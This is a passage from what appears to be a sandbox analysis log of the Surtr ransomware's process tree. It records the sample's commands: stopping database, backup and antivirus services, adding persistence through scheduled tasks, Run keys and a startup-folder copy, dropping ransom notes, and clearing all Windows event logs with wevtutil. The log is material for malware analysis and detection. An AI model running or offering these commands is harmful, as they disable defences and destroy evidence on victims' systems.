5⤵
PID:2840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"
3⤵
PID:2976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"
3⤵
PID:992

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$SBSMONITORING"
4⤵
PID:2284

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"
5⤵
PID:1264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"
3⤵
PID:2008

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$SHAREPOINT"
4⤵
PID:3372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"
5⤵
PID:3400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"
3⤵
PID:2488

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$SQL_2008"
4⤵
PID:2240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"
5⤵
PID:1824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"
3⤵
PID:3416

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$SYSTEM_BGC"
4⤵
PID:2848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"
5⤵
PID:2640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"
3⤵
PID:2376

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$TPS"
4⤵
PID:2140

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"
5⤵
PID:1784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"
3⤵
PID:1056

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$TPSAMA"
4⤵
PID:3432

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"
5⤵
PID:416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"
3⤵
PID:2468

C:\Windows\system32\net.exe
net stop "MSSQLSERVER"
4⤵
PID:3428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLSERVER"
5⤵
PID:788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"
3⤵
PID:520

C:\Windows\system32\net.exe
net stop "MSSQLServerADHelper100"
4⤵
PID:3384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
5⤵
PID:3380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
3⤵
PID:1888

C:\Windows\system32\attrib.exe
attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
4⤵
- Views/modifies file attributes
PID:1524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"
3⤵
PID:2224

C:\Windows\system32\net.exe
net stop "MSSQLServerOLAPService"
4⤵
PID:2220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
5⤵
PID:1512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MySQL80"
3⤵
PID:3444

C:\Windows\system32\net.exe
net stop "MySQL80"
4⤵
PID:1484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MySQL80"
5⤵
PID:3412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
PID:3364

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
4⤵
- Creates scheduled task(s)
PID:2704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MySQL57"
3⤵
PID:3460

C:\Windows\system32\net.exe
net stop "MySQL57"
4⤵
PID:3440

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MySQL57"
5⤵
PID:1348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"
3⤵
PID:2836

C:\Windows\system32\net.exe
net stop "OracleClientCache80"
4⤵
PID:1200

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "OracleClientCache80"
5⤵
PID:2308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "PDVFSService"
3⤵
PID:2216

C:\Windows\system32\net.exe
net stop "PDVFSService"
4⤵
PID:1828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "PDVFSService"
5⤵
PID:3456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "POP3Svc"
3⤵
PID:968

C:\Windows\system32\net.exe
net stop "POP3Svc"
4⤵
PID:3476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "POP3Svc"
5⤵
PID:2112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ReportServer"
3⤵
PID:3328

C:\Windows\system32\net.exe
net stop "ReportServer"
4⤵
PID:3316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ReportServer"
5⤵
PID:1008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"
3⤵
PID:1620

C:\Windows\system32\net.exe
net stop "ReportServer$SQL_2008"
4⤵
PID:3468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ReportServer$SQL_2008"
5⤵
PID:3492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"
3⤵
PID:3512

C:\Windows\system32\net.exe
net stop "ReportServer$SYSTEM_BGC"
4⤵
PID:3504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"
5⤵
PID:3488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"
3⤵
PID:1144

C:\Windows\system32\net.exe
net stop "ReportServer$TPS"
4⤵
PID:208

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ReportServer$TPS"
5⤵
PID:216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"
3⤵
PID:224

C:\Windows\system32\net.exe
net stop "ReportServer$TPSAMA"
4⤵
PID:232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ReportServer$TPSAMA"
5⤵
PID:3536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "RESvc"
3⤵
PID:3528

C:\Windows\system32\net.exe
net stop "RESvc"
4⤵
PID:3520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "RESvc"
5⤵
PID:3560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "sacsvr"
3⤵
PID:3552

C:\Windows\system32\net.exe
net stop "sacsvr"
4⤵
PID:3544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "sacsvr"
5⤵
PID:3588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SamSs"
3⤵
PID:2912

C:\Windows\system32\net.exe
net stop "SamSs"
4⤵
PID:2804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs"
5⤵
PID:3584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SAVAdminService"
3⤵
PID:3576

C:\Windows\system32\net.exe
net stop "SAVAdminService"
4⤵
PID:3572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SAVAdminService"
5⤵
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
3⤵
PID:532

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
4⤵
- Creates scheduled task(s)
PID:3620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SAVService"
3⤵
PID:3564

C:\Windows\system32\net.exe
net stop "SAVService"
4⤵
PID:3608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SAVService"
5⤵
PID:3652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Smcinst"
3⤵
PID:3644

C:\Windows\system32\net.exe
net stop "Smcinst"
4⤵
PID:3636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Smcinst"
5⤵
PID:3676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SmcService"
3⤵
PID:3668

C:\Windows\system32\net.exe
net stop "SmcService"
4⤵
PID:3660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SmcService"
5⤵
PID:3708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SMTPSvc"
3⤵
PID:3700

C:\Windows\system32\net.exe
net stop "SMTPSvc"
4⤵
PID:3692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SMTPSvc"
5⤵
PID:3684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SNAC"
3⤵
PID:3628

C:\Windows\system32\net.exe
net stop "SNAC"
4⤵
PID:3604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SNAC"
5⤵
PID:3740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SntpService"
3⤵
PID:3724

C:\Windows\system32\net.exe
net stop "SntpService"
4⤵
PID:3716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SntpService"
5⤵
PID:3748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
3⤵
- Drops startup file
PID:3764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "sophossps"
3⤵
PID:3732

C:\Windows\system32\net.exe
net stop "sophossps"
4⤵
PID:3784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "sophossps"
5⤵
PID:3768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
3⤵
PID:3776

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
4⤵
- Adds Run key to start application
PID:3752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"
3⤵
PID:3820

C:\Windows\system32\net.exe
net stop "SQLAgent$BKUPEXEC"
4⤵
PID:3812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"
5⤵
PID:3804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
3⤵
PID:3796

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
4⤵
- Adds Run key to start application
PID:3788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
3⤵
PID:3844

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
4⤵
- Adds Run key to start application
PID:3828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"
3⤵
PID:3836

C:\Windows\system32\net.exe
net stop "SQLAgent$ECWDB2"
4⤵
PID:3868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$ECWDB2"
5⤵
PID:3852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
3⤵
PID:3904

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
4⤵
- Adds Run key to start application
PID:3888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"
3⤵
PID:3896

C:\Windows\system32\net.exe
net stop "SQLAgent$PRACTTICEBGC"
4⤵
PID:3948

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"
5⤵
PID:3932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"
3⤵
PID:3936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"
3⤵
PID:3924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"
3⤵
PID:3968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"
3⤵
PID:3952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"
3⤵
PID:3980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"
3⤵
PID:3964

C:\Windows\system32\net.exe
net stop "SQLAgent$PROFXENGAGEMENT"
4⤵
PID:4036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"
5⤵
PID:4044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
3⤵
PID:4012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
4⤵
PID:4028

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Analytic"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Application"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DebugChannel"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3424

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Key Management Service"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Media Center"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
4⤵
PID:3900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
4⤵
PID:3980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
4⤵
PID:2780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
4⤵
PID:3132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
4⤵
PID:2880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
4⤵
PID:2748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
4⤵
- Clears Windows event logs
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
4⤵
PID:2152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
4⤵
PID:2732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
4⤵
PID:2824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
4⤵
PID:2356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
4⤵
- Clears Windows event logs
PID:2132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
4⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
4⤵
PID:760

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
4⤵
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
4⤵
PID:2720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
4⤵
PID:1152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
4⤵
PID:1436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
4⤵
- Clears Windows event logs
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
4⤵
PID:1900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
4⤵
PID:1664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
4⤵
PID:736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
4⤵
PID:3192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
4⤵
PID:3184

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
4⤵
PID:2032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
4⤵
PID:3208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
4⤵
- Clears Windows event logs
PID:3200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
4⤵
PID:988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
4⤵
PID:3256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
4⤵
- Clears Windows event logs
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
4⤵
PID:1116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
4⤵
PID:1012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
4⤵
PID:1448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
4⤵
PID:3216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
4⤵
PID:3232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
4⤵
PID:3280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
4⤵
PID:2700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
4⤵
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
4⤵
PID:3268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
4⤵
- Clears Windows event logs
PID:2056

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
4⤵
PID:2588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
4⤵
PID:2352

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
4⤵
PID:2384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
4⤵
PID:2136

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
4⤵
PID:2072

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
4⤵
PID:2340

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
4⤵
PID:2544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
4⤵
PID:2200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
4⤵
PID:3284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
4⤵
PID:2484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
4⤵
PID:2368

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
4⤵
PID:2364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
4⤵
PID:2260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
4⤵
- Clears Windows event logs
PID:1064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
4⤵
PID:3388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
4⤵
PID:1680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
4⤵
PID:1480

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
4⤵
PID:2392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
4⤵
PID:2472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
4⤵
PID:1264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
4⤵
PID:1916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
4⤵
PID:2316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
4⤵
PID:2248

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
4⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
4⤵
PID:3420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
4⤵
PID:2144

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
4⤵
PID:2240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
4⤵
- Clears Windows event logs
PID:1056

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
4⤵
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
4⤵
PID:3380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
4⤵
- Clears Windows event logs
PID:2468

